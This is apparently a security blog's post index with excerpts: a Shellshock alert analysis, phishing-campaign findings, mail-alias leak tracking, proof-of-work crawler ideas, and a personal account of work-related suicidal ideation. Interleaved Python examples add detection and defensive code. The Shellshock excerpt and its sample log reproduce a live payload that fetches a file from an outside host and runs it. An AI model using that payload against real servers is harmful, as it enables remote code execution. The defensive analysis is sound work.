
How work sometimes literally tries to kill you

Note by nyanbinary: This post is not by me but a guest contributor, just to avoid any confusion.

Two weeks ago I had a mental breakdown, which led to me wanting to kill myself seriously enough that my friends strongly urged me to get checked into a stationary psych ward. The process of doing so was annoying, stressful, and occasionally just deeply stupid, but really isn't the point of writing this (though I would like to thank my friends, who tirelessly tried to keep me alive and get me help).

The much more relevant point is: How did I get here? I have had my struggles with suicidal ideation in the past, but I had been mostly stable since getting on HRT. The reason for the resurgence is fairly simple (and spoiled by the title): Work.

Read more…

Recursive CVD

About two years ago a few enthusiastic employees in the Security Operations team at $myJob did the right thing: They convinced management that we need a published Coordinated Vulnerability Disclosure (CVD) process (including a safe harbour for researchers) & a reporting path. They then set out to write the policy, commissioned a pretty basic website, and got every other company website to insert a link into the footer. The website, on paper, did everything right: fully IaC, running on a centrally provided webapp product managed by our Cloud team. No publicly reachable admin interface, every content change going through our CMS. Explicitly minimalistic. The requirements document was about 60% security requirements, mostly written by experienced pentesters & containing explicit how-tos on, for example, building a proper CSP.

Unfortunately the employees who drove the topic were moved to a very different role soon after, and the topic remained with the Vulnerability Management area. Here... enthusiasm & understanding were lacking, so the site kinda... just sat there. The few actual reports that were received were handled without much urgency or care, to be honest, and I can't really fault them; it was a lot of crap for not a lot of gain & they were busy.

When I joined that team I... kinda just stole ownership of the topic because I do care. Things since then haven't been going great: I also am busy/handling too many topics, fixes are often slow, in some cases the business will do its best to just ignore or sit out pretty critical stuff, there are so many technical issues (including us being unable to deploy any changes for months), and a complete lack of documentation makes fixing anything hell (I'm currently writing the first actual docs on this, 2 years after release, lol). But things are improving & this is one of the areas where I can truly call mine. Give it another 6 months & I am pretty certain I'll be able to call this "good enough".

What am I going to do in those 6 months? Well, stabilize deployment, iron out smaller technical issues, ... and fix the backlog of security issues that currently exist in the application.

Read more…

We deserve better cybercriminals

One of the benefits of having your own mail server is access to an inexhaustible pool of addresses & aliases. At some point around 2018 I started to make use of this: Every service I'd sign up for would receive a separate alias. Aliases were chosen pseudorandomly, essentially base64-encoded randomness; they were generated in bulk & the list was annotated with the associated service. Over the 7 years since, ~200 such aliases have been used.

Looking back, an improvement I should have made is using email addresses that more closely mimic real human addresses, but :shrug:.

The goal behind this was 2-fold:

  • tracking of (unreported) data leaks & sales

  • easy migration away from publicized/leaked addresses

I'll be honest... it has been disappointing so far. Even with minimal filtering I have been receiving essentially no spam and no phishing on any of the addresses.

The only exception here is the email I used for Roll20, during both the 2018 and the 2024 data breaches. For some reason I had not rotated the email between these two, so I can't quite match the three groups of phishing emails I received to the specific breach, but that should probably be #3 in the "goal" section: matching campaigns to breaches.

Anyway, I want to look at the three clusters for a bit.
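The per-service alias scheme described above, as an added Python example (not the author's tooling): aliases are generated from randomness, each one is recorded against the service it was handed to, and inbound recipients are attributed back to the leaking service. The domain, registry and sample recipients are constructed. One deviation from the post is deliberate: the local part is base32 rather than base64 and lower-cased, because many MTAs and web forms fold the local part to lower case, and two base64 aliases differing only in case would collide after folding.

```python
"""Per-service mail aliases with leak attribution.

Added example, not the author's tooling. Assumptions: a catch-all domain
(constructed: "example.net"), an in-memory registry standing in for the
author's annotated alias list, and inbound mail seen as recipient addresses.
"""
import base64
import secrets
from collections import Counter
from typing import Dict, Iterable, Optional

DOMAIN = "example.net"  # constructed; the author's real mail domain is not on the page


def generate_alias(domain: str = DOMAIN, nbytes: int = 10) -> str:
    """Return a pseudorandom alias of the form local@domain.

    The post uses base64-encoded randomness. Base32, lower-cased, is used here
    instead: receivers commonly fold the local part to lower case, and base64
    aliases that differ only in case would then become indistinguishable.
    10 random bytes encode to exactly 16 base32 characters, no padding.
    """
    raw = secrets.token_bytes(nbytes)
    local = base64.b32encode(raw).decode("ascii").rstrip("=").lower()
    return f"{local}@{domain}"


class AliasRegistry:
    """Maps each alias to the service it was handed to."""

    def __init__(self) -> None:
        self._by_alias: Dict[str, str] = {}

    def register(self, alias: str, service: str) -> None:
        """Record an existing alias (case-folded) against a service."""
        self._by_alias[alias.strip().lower()] = service

    def assign(self, service: str) -> str:
        """Generate a fresh alias for a service and record it."""
        alias = generate_alias()
        self.register(alias, service)
        return alias

    def attribute(self, recipient: str) -> Optional[str]:
        """Which service was given this address? None if it is not a known alias."""
        return self._by_alias.get(recipient.strip().lower())

    def attribute_batch(self, recipients: Iterable[str]) -> Counter:
        """Count unsolicited mail per service; a spike on one service points at a leak."""
        counts: Counter = Counter()
        for rcpt in recipients:
            service = self.attribute(rcpt)
            counts[service if service is not None else "<unknown>"] += 1
        return counts


if __name__ == "__main__":
    registry = AliasRegistry()
    registry.register("abc123@example.net", "roll20")  # constructed alias
    print(registry.attribute("ABC123@example.net"))   # roll20 (case-folded lookup)
    print(registry.assign("some-shop"))               # fresh 16-char alias
```

Feeding the `To:`/`Delivered-To:` recipients of the junk folder through `attribute_batch` gives the per-service tally the post is after; the `<unknown>` bucket catches mail to addresses that were never handed out (dictionary attacks on the catch-all domain rather than leaks).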

Read more…

Ideas for Proof of Work crawler protection

A while ago I wrote a post about Anubis in which I called it kinda crap but fine. Of course my brain didn't shut off after that so, uh, here are some thoughts on how one could solve some of the issues of the proof-of-work approach Anubis uses. I am sure there is prior literature & I am just reinventing the wheel, but I wanna see how far I can get on my own (with the design for now, I can't program for shit...).

In the previous blogpost I highlighted the work imbalance in the approach Anubis uses: provide a proof-of-work solution once, get a cookie, do all the requests you want within a multi-day time period. Or in other words: required work does not scale with the number of requests. If you intend to keep the site usable for flesh-and-blood users, crawlers don't really pay a high cost either. Unfortunately you can't really limit the number of calls with one token either (without going stateful, ew)... so what if we just required constant proofs instead?
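One way to make the "constant proofs" idea concrete without server-side state, as an added Python example (this is not Anubis' code and not the author's design): the server derives a challenge per request from an HMAC over the path, the client IP and a coarse time window under a server secret; the client must find a nonce whose hash against that challenge has a number of leading zero bits; the server verifies by recomputing the challenge rather than remembering it. The secret, difficulty, window length and IP binding are assumptions. Work now scales with the number of distinct (path, window) pairs a crawler touches, which is what the previous post asked for.

```python
"""Per-request, stateless proof-of-work.

Added example of requiring a proof with every request. Not Anubis' code.
Assumptions: a server-side secret (constructed below), difficulty in leading
zero bits, a time window that bounds replay without any server-side state,
and binding to the client IP (which is weak behind CGNAT or large proxies).
"""
import hashlib
import hmac
import struct
import time
from typing import Optional

SECRET = b"constructed-server-secret-rotate-me"  # assumption: kept server-side, rotated
DIFFICULTY_BITS = 12                              # low for the example; raise in practice
WINDOW_SECONDS = 60                               # replay of one proof is possible within a window


def challenge(path: str, client_ip: str, now: Optional[float] = None) -> bytes:
    """Derive the challenge for one request.

    It is an HMAC under the server secret over the path, the client IP and the
    current time window, so the server can recompute it at verification time
    instead of storing issued challenges.
    """
    if now is None:
        now = time.time()
    window = int(now // WINDOW_SECONDS)
    msg = f"{path}\n{client_ip}\n{window}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).digest()


def _leading_zero_bits(digest: bytes) -> int:
    """Number of leading zero bits in a big-endian digest."""
    n = int.from_bytes(digest, "big")
    return len(digest) * 8 - n.bit_length()


def _hash(chal: bytes, nonce: int) -> bytes:
    return hashlib.sha256(chal + struct.pack(">Q", nonce)).digest()


def solve(chal: bytes, bits: int = DIFFICULTY_BITS) -> int:
    """Client side: brute-force a nonce so sha256(challenge || nonce) has `bits` leading zeros.

    Expected cost is 2**bits hashes per request, paid again for every path and
    every window; a cached cookie does not help a crawler here.
    """
    nonce = 0
    while _leading_zero_bits(_hash(chal, nonce)) < bits:
        nonce += 1
    return nonce


def verify(path: str, client_ip: str, nonce: int,
           now: Optional[float] = None, bits: int = DIFFICULTY_BITS) -> bool:
    """Server side: recompute the challenge for this request and check the nonce.

    The previous window is accepted too, so a proof computed just before a
    window boundary is not rejected. Nothing is stored between requests.
    """
    if now is None:
        now = time.time()
    for t in (now, now - WINDOW_SECONDS):
        if _leading_zero_bits(_hash(challenge(path, client_ip, t), nonce)) >= bits:
            return True
    return False


if __name__ == "__main__":
    ip = "203.0.113.5"  # constructed client address
    chal = challenge("/page/1", ip)
    nonce = solve(chal)
    print("nonce", nonce, "accepted:", verify("/page/1", ip, nonce))
```

The caveat a practitioner will spot immediately: within one window the same nonce replays for the same path and IP, and the window cannot be made very short without rejecting honest slow clients, so the stateless variant trades a bounded replay budget for having no per-token counters. Raising `DIFFICULTY_BITS` by one doubles the cost for everybody, crawler and human alike, which is the same tension the Anubis post described.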

Read more…

Short: Shellshocked!

Just a short one for now: Tonight I received a maximum severity alert from my SIEM, one of my internet-facing webservers received a Shellshock attack! After a quick check for successful exploitation (none that I could see) I went back to sleep.

This is what was attempted (except not defanged, duh):

Timestamp: 2025-06-14T01:23:07+0200
Source IP: 104.131.118.62
Action: GET /nagios/cgi-bin/status.cgi HTTP/1.1
User Agent: () { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnZAZAZA\x22';system(\x22wget -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif;curl -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif; lwp-download -a http[://]pjsn[.]hi2[.]ro/gif.gif /tmp/gif.gif;perl /tmp/gif.gif;rm -rf /tmp/gif.gif*;exit\x22)

Or in human: Use the user agent to do the (){ :;}; thing, print something in perl I haven't fully made sense of yet, system to download a file (three different ways, depending on what downloader is available), execute the file as a perl script, then clean up behind yourself.

I just want to point out though: I think this is broken in multiple ways?
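The kind of check that turns the alert above into something you can act on at 1 AM, as an added Python example (not the author's SIEM rule): parse combined-format access-log lines, flag a User-Agent that starts with the Shellshock function-definition prefix, pull out the second-stage download URLs, and note whether the targeted CGI actually answered. The log lines are constructed; the first reproduces the post's payload, already defanged, with an assumed 404 status and size.

```python
"""Detect Shellshock probes in web-server access logs.

Added example, not the author's SIEM rule. Assumptions: Apache/nginx combined
log format, lines constructed below (the payload is the post's, kept defanged),
and the "() {" function-definition prefix in a header as the indicator.
"""
import re
from typing import Dict, List, Optional

# The Shellshock trigger: an environment-variable value starting with "() {".
# Spacing between the tokens varies between samples, so allow it.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:?;?\s*\}\s*;")

# Second-stage URLs, matched in the defanged form the post uses ("http[://]", "[.]").
URL_RE = re.compile(r"https?\[://\][^\s;\"']+")

# Combined log format: ip ident user [ts] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>.*)"$'
)

# Constructed sample: line 1 is the post's probe (status/size assumed), line 2 is benign.
SAMPLE_LOG = [
    r'''104.131.118.62 - - [14/Jun/2025:01:23:07 +0200] "GET /nagios/cgi-bin/status.cgi HTTP/1.1" 404 196 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnZAZAZA\x22';system(\x22wget -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif;curl -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif; lwp-download -a http[://]pjsn[.]hi2[.]ro/gif.gif /tmp/gif.gif;perl /tmp/gif.gif;rm -rf /tmp/gif.gif*;exit\x22)"''',
    r'''198.51.100.7 - - [14/Jun/2025:01:25:00 +0200] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0"''',
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_shellshock(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for a line whose User-Agent carries a Shellshock payload, else None."""
    rec = parse_line(line)
    if rec is None or not SHELLSHOCK_RE.search(rec["ua"]):
        return None
    return {
        "src_ip": rec["ip"],
        "timestamp": rec["ts"],
        "request": rec["req"],
        "status": rec["status"],
        "payload_urls": sorted(set(URL_RE.findall(rec["ua"]))),
        # The header only reaches bash if the CGI exists and ran; a 2xx on the
        # CGI target is the case worth checking for a dropped /tmp/gif.gif.
        "cgi_answered": rec["status"].startswith("2"),
    }


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run the detection over a batch of log lines and keep the findings."""
    return [f for f in (detect_shellshock(line) for line in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The `cgi_answered` flag is the triage shortcut: a 404 means the request never reached a CGI handler, so bash never saw the crafted environment variable; a 200 on the Nagios path is when the "did it actually run" check is worth doing.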

Read more…

Hotels I won't visit

I recently got my hands on a sample of a phishing campaign. Pretty boring one, fwiw, "just" trying to steal personal + credit card data, but still felt like doing a bit of digging. Here are some findings.

While I will share domains & url patterns I will not share full URLs as the associated pages contain personal data (esp. names) of targets. If you have a need for the full urls feel free to reach out to me.

I will not be able to share the original sample email.

The email

I received my sample email(s) from someone who had recently booked a stay with a specific Austrian Hotel (Hi5-Hotel) through Booking.com. At a later point (2025-06-01) they received a notification from Booking.com about the need to provide additional information, otherwise their stay would be cancelled, with the hotel being named as the sender.

Reviewing the mail itself it looked technically clean, actually coming from a Booking.com subdomain & passing SPF. I will not even include any IOCs for the email itself here as I am rather certain this is, technically, a legitimate email.

The link in the body, however, was highly suspicious: https://hi5XXXX.gstlly.com/ (with XXXX being four random lowercase alphabetic characters). By the time my recipient interacted with that email (2025-06-02) the specific domain had already been flagged as malicious in a security product in use by the recipient, so no damage was done in this case.

Read more…

Do you know where your sponsors are?

tl;dr: I believe that Content Creators have a responsibility for all sponsor claims they make & repeat. If they cannot do that, they must not advertise outside their area of expertise.

Ads & Waffengleichheit

I do not like advertisement. It wastes my time, it wastes customers' money, it is annoying, yada yada yada. Not much new here.

But it also is unfair. The person I first heard this idea from (working in customer retention) saw a fundamental issue in the "Waffengleichheit" (German, lit. "equality of arms"): on the one side we have professionals using decades to centuries of industry research & the resources of sometimes multi-billion companies, on the other side some individual just trying to live their life while being under near-constant bombardment by product propaganda.

With this unbelievable asymmetry an individualistic defense is simply not possible. Even if you yourself may consider yourself defended against this propaganda (you aren't!), I believe that society has a duty to defend its vulnerable, not to accept a status in which only the strongest can succeed. As advertisement is not going anywhere anytime soon this means: Controls, limits, and checks are required for advertisement, to at least curb the worst excesses.

Read more…